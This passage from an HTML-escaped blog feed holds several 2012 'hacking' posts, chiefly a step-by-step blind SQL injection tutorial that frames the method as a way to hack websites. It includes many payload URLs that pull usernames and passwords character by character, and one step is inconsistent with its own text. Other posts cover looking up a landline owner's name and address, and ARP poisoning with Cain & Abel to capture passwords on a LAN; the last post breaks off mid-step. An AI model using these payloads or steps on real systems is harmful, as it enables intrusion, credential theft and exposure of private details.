&lt;b&gt;Thanks For Reading This &lt;span style="color: red;"&gt;:p&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;b&gt;Keep Visiting :-&lt;/b&gt;&lt;b style="color: red;"&gt;&lt;a href="http://www.indicyborg.blogspot.in/"&gt;Indicyborg&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4A9gdFEZv6AD56JzcxcjucL4CoFdkC2gs-7gm1cX1UyHpXhbKmAI07lOyUpzYO4jWwC44b8ew6yBzImHLMwO8NrCXjrkHpC4d_4NncswRpZthqXTCvJVMEti6rLH4_MWLzEZdVzFdEg/s72-c/sql-injection.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Blind Sqli Tutorial To Hack A Website </title><link>http://indicyborg.blogspot.com/2012/08/blind-sqli-tutorial-to-hack-website.html</link><category>Hacking</category><category>Sql Injection</category><category>Website Hacking</category><author>noreply@blogger.com (Akshay)</author><pubDate>Wed, 22 Aug 2012 10:08:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-5791411106298494925</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTrbDI-Ld36wwxXy848j691fWLGpncxUye3cz8Vy3oTgrrx1f5HfRyojtBJjJhyFGZxgnIVT7nf4VNrOVPBPZgp2Vr1_kBCXZmq127jFs_POaz6bdQFC1m0Q1WtOmBUocwEdu3rHJbIw/s1600/blind+sqli+tut.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTrbDI-Ld36wwxXy848j691fWLGpncxUye3cz8Vy3oTgrrx1f5HfRyojtBJjJhyFGZxgnIVT7nf4VNrOVPBPZgp2Vr1_kBCXZmq127jFs_POaz6bdQFC1m0Q1WtOmBUocwEdu3rHJbIw/s400/blind+sqli+tut.jpeg" width="341" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;b style="color: red;"&gt;Blind Sqli&lt;/b&gt;&lt;span style="color: red;"&gt; &lt;/span&gt;is one of the most famous technique to &lt;b&gt;hack a website&lt;/b&gt;..it is being used by many great hacker over the world to hack many banking websites as well as many popular websites.&lt;br /&gt;
Still today also millions of &lt;b&gt;webs sites&lt;/b&gt; and &lt;b&gt;vulnerable&lt;/b&gt;, can be turn down and credential information can be leaked using this &lt;b style="color: red;"&gt;"Blind Sqli" &lt;/b&gt;...&lt;br /&gt;
&lt;br /&gt;
Here is the complete step by step tutorial&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Before going into it lets understand &lt;b&gt;what is Blind Sqli?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Blind SQL Injection &lt;/b&gt;is used when a&lt;b&gt; web application is vulnerable to an SQL injection &lt;/b&gt;but the results of the injection are not visible to the attacker.Mean to say The page with the vulnerability may not be one that displays data but will display differently depending on the logical statement injected. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;The steps Begins here:&lt;/b&gt;&lt;br /&gt;
Suppose That You want to Hack This website with Blind Sqli for that you have to find such type of link shown below..&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
http://site.com/index.php?id=5&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
when we execute this, we see some page and articles on that page, pictures&lt;br /&gt;
etc…&lt;br /&gt;
&lt;br /&gt;
then when we want to test it for blind sql injection attack&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;http://www.site.com/index.php?id=5 and 1=1&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
this is always true and the page loads normally,that's ok.&lt;br /&gt;
&lt;br /&gt;
now the real test&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;http://www.site.com/index.php?id=5 and 1=2&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
this is false&lt;br /&gt;
&lt;br /&gt;
so if some text, picture or some content is missing on returned page then&lt;br /&gt;
that site is vulrnable to blind sql injection.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1) &lt;/b&gt;Get the MySQL version&lt;br /&gt;
&lt;br /&gt;
to get the version in blind attack we use substring i.e&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;http://www.site.com/index.php?id=5 and substring(@@version,1,1)=4&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
this should return &lt;b&gt;TRUE&lt;/b&gt; if the version of &lt;b&gt;MySQL is 4&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
replace &lt;b&gt;4 with 5&lt;/b&gt;, and if query return&lt;b&gt; TRUE then the version is 5&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
i.e&lt;br /&gt;
&lt;b&gt;http://www.site.com/index.php?id=5 and substring(@@version,1,1)=5&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2) &lt;/b&gt;Test if subselect works&lt;br /&gt;
when select don't work then we use subselect&lt;br /&gt;
&lt;br /&gt;
i.e&lt;br /&gt;
&lt;b&gt;http://www.site.com/index.php?id=5 and (select 1)=1&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
if page loads normally then subselects work.&lt;br /&gt;
then we gonna see if we have access to mysql.&lt;br /&gt;
user&lt;br /&gt;
&lt;br /&gt;
i.e&lt;br /&gt;
&lt;b&gt;http://www.site.com/index.php?id=5 and (select 1 from mysql.user limit 0,1)=1&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
if page loads normally we have access to mysql.user and then later we can&lt;br /&gt;
&lt;br /&gt;
pull some password usign&lt;b&gt; load_file() &lt;/b&gt;function and OUTFILE.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;3)&lt;/b&gt;. Check table and column names&lt;br /&gt;
&lt;br /&gt;
This is part when guessing is the best friend&lt;br /&gt;
i.e.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;http://www.site.com/index.php?id=5 and (select 1 from users limit 0,1)=1&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
(with limit 0,1 our query here returns 1 row of data, cause subselect&lt;br /&gt;
returns only 1 row, this is very important.)&lt;br /&gt;
&lt;br /&gt;
then if the page loads normally without content missing, the table users&lt;br /&gt;
exits.&lt;br /&gt;
&lt;br /&gt;
if you get FALSE (some article missing),&lt;br /&gt;
just change table name until you&lt;br /&gt;
guess the right one :)&lt;br /&gt;
&lt;br /&gt;
let's say that we have found that table name is users,&lt;br /&gt;
now what we need is&lt;br /&gt;
column name.&lt;br /&gt;
&lt;br /&gt;
the same as table name,&lt;br /&gt;
we start guessing. Like i said before try the&lt;br /&gt;
common names for columns.&lt;br /&gt;
&lt;br /&gt;
i.e&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;http://www.site.com/index.php?id=5 and (select substring(concat(1,&lt;br /&gt;
password),1,1) from users limit 0,1)=1&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
if the page loads normally we know that column name is password (if we get&lt;br /&gt;
false then try common names or just guess)&lt;br /&gt;
&lt;br /&gt;
here we merge 1 with the column password,&lt;br /&gt;
then substring returns the first&lt;br /&gt;
character (,1,1)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;4).&lt;/b&gt; Pull data from database&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
we found table users i columns username password so we gonna pull&lt;br /&gt;
characters from that.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat&lt;br /&gt;
(username,0x3a,password) from users limit 0,1),1,1))&amp;gt;80&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
ok this here pulls the first character from first user in table users.&lt;br /&gt;
substring here returns first character and 1 character in length.&lt;br /&gt;
ascii()&lt;br /&gt;
&lt;br /&gt;
converts that 1 character into ascii value&lt;br /&gt;
and then compare it with simbol greater then "&amp;gt;" .&lt;br /&gt;
&lt;br /&gt;
so if the ascii char greater then 80, the page loads normally. (TRUE)&lt;br /&gt;
&lt;br /&gt;
we keep trying until we get false.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat&lt;br /&gt;
(username,0x3a,password) from users limit 0,1),1,1))&amp;gt;95&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
we get TRUE, keep incrementing&lt;br /&gt;
&lt;b&gt;http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat&lt;br /&gt;
(username,0x3a,password) from users limit 0,1),1,1))&amp;gt;98&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;TRUE&lt;/b&gt; again, higher&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat&lt;br /&gt;
(username,0x3a,password) from users limit 0,1),1,1))&amp;gt;99&lt;br /&gt;
&lt;span style="color: red;"&gt;FALSE!!!&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
so the first character in username is &lt;b&gt;char(99)&lt;/b&gt;. Using the ascii converter&lt;br /&gt;
&lt;br /&gt;
we know that char(99) is letter 'c'.&lt;br /&gt;
then let's check the second character.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat&lt;br /&gt;
(username,0x3a,password) from users limit 0,1),2,1))&amp;gt;99&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it&lt;br /&gt;
returns the second character, 1 character in lenght)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat&lt;br /&gt;
(username,0x3a,password) from users limit 0,1),1,1))&amp;gt;99&lt;/b&gt;&lt;br /&gt;
&lt;b style="color: red;"&gt;TRUE&lt;/b&gt;, the page loads normally, higher.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat&lt;br /&gt;
(username,0x3a,password) from users limit 0,1),1,1))&amp;gt;107&lt;/b&gt;&lt;br /&gt;
&lt;b style="color: red;"&gt;FALSE&lt;/b&gt;, lower number.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat&lt;br /&gt;
(username,0x3a,password) from users limit 0,1),1,1))&amp;gt;104&lt;/b&gt;&lt;br /&gt;
&lt;b style="color: red;"&gt;TRUE&lt;/b&gt;, higher.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat&lt;br /&gt;
(username,0x3a,password) from users limit 0,1),1,1))&amp;gt;105&lt;br /&gt;
&lt;span style="color: red;"&gt;FALSE!!!&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
we know that the second character is &lt;b&gt;char(105)&lt;/b&gt; and that is 'i'. We have&lt;br /&gt;
'ci' so far&lt;br /&gt;
&lt;br /&gt;
so keep incrementing until you get the end. (when &amp;gt;0 returns false we know&lt;br /&gt;
that we have reach the end).&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Thankz For Reading&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Keep Visiting :- &lt;span style="color: red;"&gt;www.indicyborg.blogspot.in&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTrbDI-Ld36wwxXy848j691fWLGpncxUye3cz8Vy3oTgrrx1f5HfRyojtBJjJhyFGZxgnIVT7nf4VNrOVPBPZgp2Vr1_kBCXZmq127jFs_POaz6bdQFC1m0Q1WtOmBUocwEdu3rHJbIw/s72-c/blind+sqli+tut.jpeg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Trace Any Number In India</title><link>http://indicyborg.blogspot.com/2012/08/trace-any-number-in-india.html</link><category>Hacking</category><category>Tips And Tricks</category><category>Trace Number</category><author>noreply@blogger.com (Akshay)</author><pubDate>Mon, 20 Aug 2012 04:28:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-2920405827649809689</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyLEz2DVnwcAQGx1aK1oJITay6NjGF59sR3c-hXp7WCz_wJQgSHM7a634qJXrg-j6zy2V8xn0x2KIUDrP54TSwfSkR_1eavgLkaCe0ZqV2kvGwnipaiuPIVarPY2E14ilzyKm05W4pgg/s1600/tracenumber.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="499" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyLEz2DVnwcAQGx1aK1oJITay6NjGF59sR3c-hXp7WCz_wJQgSHM7a634qJXrg-j6zy2V8xn0x2KIUDrP54TSwfSkR_1eavgLkaCe0ZqV2kvGwnipaiuPIVarPY2E14ilzyKm05W4pgg/s640/tracenumber.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;Hi Readers.Im Back Again.&lt;br /&gt;
&lt;br /&gt;
today im going to tell you awsm trick.&lt;br /&gt;
with the help of this trick or method anyone can &lt;b style="color: red;"&gt;trace or find address and other info the number.&lt;/b&gt;&lt;br /&gt;
and this method works only for&lt;b style="color: red;"&gt; landlines&lt;/b&gt;.im not teaching here &lt;b&gt;&lt;span style="color: red;"&gt;how to find or trace mobile numbers&lt;/span&gt;&lt;/b&gt; :p&lt;br /&gt;
&lt;br /&gt;
So we can start.&lt;br /&gt;
&lt;br /&gt;
First take a &lt;b&gt;landline number of the target.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;than goto this link ----&amp;gt;&lt;/b&gt; &lt;a href="http://phonebook.bol.net.in/"&gt;&lt;b style="color: red;"&gt;Trace Number&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;See Image:&lt;/b&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT5oUf4WJuG8hMwpTYA8FoyvczLH4CLhyphenhyphenIHh7zg4x14mGST4UobK5Z8gDzHRTlHtQ_ArLZinI6eFfOgREBCgKnf1JjZl0IkyNRaY0RXzfNUY2D08-5pqM3gJeF_c2j1oOxYxKR34bOSw/s1600/tracenumber-1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="412" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT5oUf4WJuG8hMwpTYA8FoyvczLH4CLhyphenhyphenIHh7zg4x14mGST4UobK5Z8gDzHRTlHtQ_ArLZinI6eFfOgREBCgKnf1JjZl0IkyNRaY0RXzfNUY2D08-5pqM3gJeF_c2j1oOxYxKR34bOSw/s640/tracenumber-1.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
and than click on &lt;b style="color: red;"&gt;4th topic telephone number.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;See Image:&lt;/b&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3e2LZV_wq8-UVprZn4UpkxNT24KmMaCLp1CzaV6NQ4OWi9PoLnzQzYX8bCIapk-JLNjbesyKcK18nxxgWzKY0nY4o5oV3WBAMcfb6ZaHzMd5ENgoJkkgToK8mKx3ft_-9s5hqMxSRUQ/s1600/tracenumber-2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="370" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3e2LZV_wq8-UVprZn4UpkxNT24KmMaCLp1CzaV6NQ4OWi9PoLnzQzYX8bCIapk-JLNjbesyKcK18nxxgWzKY0nY4o5oV3WBAMcfb6ZaHzMd5ENgoJkkgToK8mKx3ft_-9s5hqMxSRUQ/s640/tracenumber-2.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
and type the number and hit enter..&lt;br /&gt;
&lt;br /&gt;
yippeee you got the&lt;b&gt; info.owners name,address&lt;/b&gt; of the number..&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Thank for reading.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Keep Visiting :- &lt;a href="http://www.indicyborg.blogspot.in/"&gt;www.indicyborg.blogspot.in&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyLEz2DVnwcAQGx1aK1oJITay6NjGF59sR3c-hXp7WCz_wJQgSHM7a634qJXrg-j6zy2V8xn0x2KIUDrP54TSwfSkR_1eavgLkaCe0ZqV2kvGwnipaiuPIVarPY2E14ilzyKm05W4pgg/s72-c/tracenumber.JPG" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>What Is Sniffing How To Perform Sniffing Video Tut</title><link>http://indicyborg.blogspot.com/2012/08/what-is-sniffing-how-to-perform.html</link><category>Hacking</category><category>Sniffing</category><author>noreply@blogger.com (Akshay)</author><pubDate>Wed, 15 Aug 2012 02:36:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-1719558655358283661</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;b&gt;Well friends previously i have already posted an article on sniffing using cain&lt;br /&gt;
&lt;a href="http://indicyborg.blogspot.in/2012/08/how-to-do-sniffing-attack-with-cain.html"&gt;&lt;span style="color: red;"&gt;Sniffing With cain&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;(If you are a fresh viewer then Please go through the first tutorial)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Today i will explain little theory part on sniffing and show a video tutorial on sniffing.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_g2Xwe1UENEJ9PH2DSGld-gPGg07Q2-2pQt49N5qCIVBJHk1uv8p3ykUT9IfdhYazrU6cTICflpvmHkjamUS4X3dWzQ0-MyIZrxZkTdcyEUVMT-Zvdk6tCwWrwilXqFTynF2cMkZPTA/s1600/scr_small_capture.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="441" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_g2Xwe1UENEJ9PH2DSGld-gPGg07Q2-2pQt49N5qCIVBJHk1uv8p3ykUT9IfdhYazrU6cTICflpvmHkjamUS4X3dWzQ0-MyIZrxZkTdcyEUVMT-Zvdk6tCwWrwilXqFTynF2cMkZPTA/s640/scr_small_capture.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;&lt;b style="color: red;"&gt;WHAT IS SNIFFING?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Sniffer is piece of tool that captures the traffic flowing into and out of a computer attached to a network.&lt;br /&gt;
&lt;br /&gt;
Sniffing is nothing but the technique of capturing protocols .&lt;br /&gt;
&lt;br /&gt;
A sniffer attack is commonly used to grab logins and passwords that are traveling around on the network (LAN).&lt;br /&gt;
&lt;br /&gt;
Sniffing can be active or passive.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;HOW TO SNIFF DATA WHICH ARE CONNECTED THROUGH LAN&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;See This Video tutorial to gain practical knowledge.&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/OcEdmOmd4kE?feature=player_embedded' frameborder='0'&gt;&lt;/iframe&gt;&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;Thankz For Reading.&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;Happy Hacking :p Keep Visiting :-&lt;/b&gt;&lt;a href="http://www.indicyborg.blogspot.in%20/"&gt;&lt;b style="color: red;"&gt; www.indicyborg.blogspot.in&lt;/b&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_g2Xwe1UENEJ9PH2DSGld-gPGg07Q2-2pQt49N5qCIVBJHk1uv8p3ykUT9IfdhYazrU6cTICflpvmHkjamUS4X3dWzQ0-MyIZrxZkTdcyEUVMT-Zvdk6tCwWrwilXqFTynF2cMkZPTA/s72-c/scr_small_capture.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How To Do Sniffing Attack With Cain Complete Tutorial</title><link>http://indicyborg.blogspot.com/2012/08/how-to-do-sniffing-attack-with-cain.html</link><category>Hacking</category><category>Sniffing</category><author>noreply@blogger.com (Akshay)</author><pubDate>Wed, 15 Aug 2012 02:29:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-2225396186048239390</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;b&gt;Hello Friends And &lt;/b&gt;&lt;b style="color: red;"&gt;Happy Independence Day 15 August 2012&lt;/b&gt; &lt;b&gt;To All Our Blog Readers..&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: blue;"&gt;today i am explaining Sniffing the packet capturing technique.&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIzOhMpeQ5fk5yT_fY_QuSQTftSzJh0dtQ8vSBAyUTxq5EDJ7W0wEOgdhSFEN210wcNt0wparLrhjj2YKPGJoaBsY8Vka4CEL_qbQE5pox0_cjTCU7lYpSmRDiO2xVvJcemJ8vsuRz6Q/s1600/sniff.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIzOhMpeQ5fk5yT_fY_QuSQTftSzJh0dtQ8vSBAyUTxq5EDJ7W0wEOgdhSFEN210wcNt0wparLrhjj2YKPGJoaBsY8Vka4CEL_qbQE5pox0_cjTCU7lYpSmRDiO2xVvJcemJ8vsuRz6Q/s640/sniff.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span style="color: black;"&gt;A Sniffer is an application or device that can read, monitor, and capture network data exchanges and read network packets. If the packets are not encrypted, a sniffer provides a full view of the data inside the packet.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Using a sniffer, an attacker can do any of the following:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;a)&lt;/b&gt; Analyze your network and gain information to eventually cause your network to crash or to become corrupted.&lt;br /&gt;
&lt;b&gt;b)&lt;/b&gt; Read your communications.&lt;br /&gt;
&lt;br /&gt;
UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain &amp;amp; Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks.&lt;br /&gt;
&lt;br /&gt;
It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.&lt;br /&gt;
&lt;br /&gt;
Sniffing LAN passwords using Cain &amp;amp; Abel.&lt;br /&gt;
&lt;b&gt;(Works only for ethernet netwoks)&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;STEP 1-&lt;/b&gt; Run Cain and Abel&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0bJwZy16WLZZCFsl8fJQW3AVtrBqd9QYbEedGJYrjS4ucM-hcxViOveClJod74tWaGwCFn_6bF4W7omY9ZHthRybPP0rfjwniRccrRGwYjRknGlep_JP_8Txc3d5lRZ25BiMkX2eQIg/s1600/sniff1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0bJwZy16WLZZCFsl8fJQW3AVtrBqd9QYbEedGJYrjS4ucM-hcxViOveClJod74tWaGwCFn_6bF4W7omY9ZHthRybPP0rfjwniRccrRGwYjRknGlep_JP_8Txc3d5lRZ25BiMkX2eQIg/s640/sniff1.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;STEP 2-&lt;/b&gt;Now click on the sniffer tab, right click and select Scan MAC Addresses. You will get a window like this:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_Fdp7g9239DM0wFngmiuE6rdx5hS85eQPHG9-TRXHwBOt-jdsJxwtP4EuQy7NsvSyra_5Ir7usTyKsAi_fOl-iv_nQ-zqJQjUa4JK1RlRZ-9nSFUroEn4m-xH8p-igjth0lXB5tW7zA/s1600/sniff2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_Fdp7g9239DM0wFngmiuE6rdx5hS85eQPHG9-TRXHwBOt-jdsJxwtP4EuQy7NsvSyra_5Ir7usTyKsAi_fOl-iv_nQ-zqJQjUa4JK1RlRZ-9nSFUroEn4m-xH8p-igjth0lXB5tW7zA/s640/sniff2.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;STEP 3-&lt;/b&gt;Check "All tests" and click OK. Cain &amp;amp; Abel will start scanning the MAC addresses in your subnet. This may take a couple of minutes. Once you have a list of hosts for poisoning, start the sniffer and APR (ARP Poison Routing).&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVMwK5unTq6ayUdWDtMUiNmFYEcYnY-jgsRuYkGZ0oyZTcwMId9BFL25hRgmSX6mJ0ngbkEJ2NgFPl-hLh1Gdjd54LlTleiJOW7ZBp43tNDzkEwLUcQPQU78gg7ZIBSDbdTPG3SNTy2g/s1600/sniff3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="496" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVMwK5unTq6ayUdWDtMUiNmFYEcYnY-jgsRuYkGZ0oyZTcwMId9BFL25hRgmSX6mJ0ngbkEJ2NgFPl-hLh1Gdjd54LlTleiJOW7ZBp43tNDzkEwLUcQPQU78gg7ZIBSDbdTPG3SNTy2g/s640/sniff3.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;STEP 4-&lt;/b&gt;All HTTP connections to the scanned hosts will be redirected to your computer and then from your computer will be sent to the host's computer. When the host will fill the HTTP form, the data will be sent to the server through your computer. Cain &amp;amp; Abel keeps a list of form field names. It will extract the values of the fields with the name matching with that in its database.&lt;br /&gt;
&lt;br /&gt;
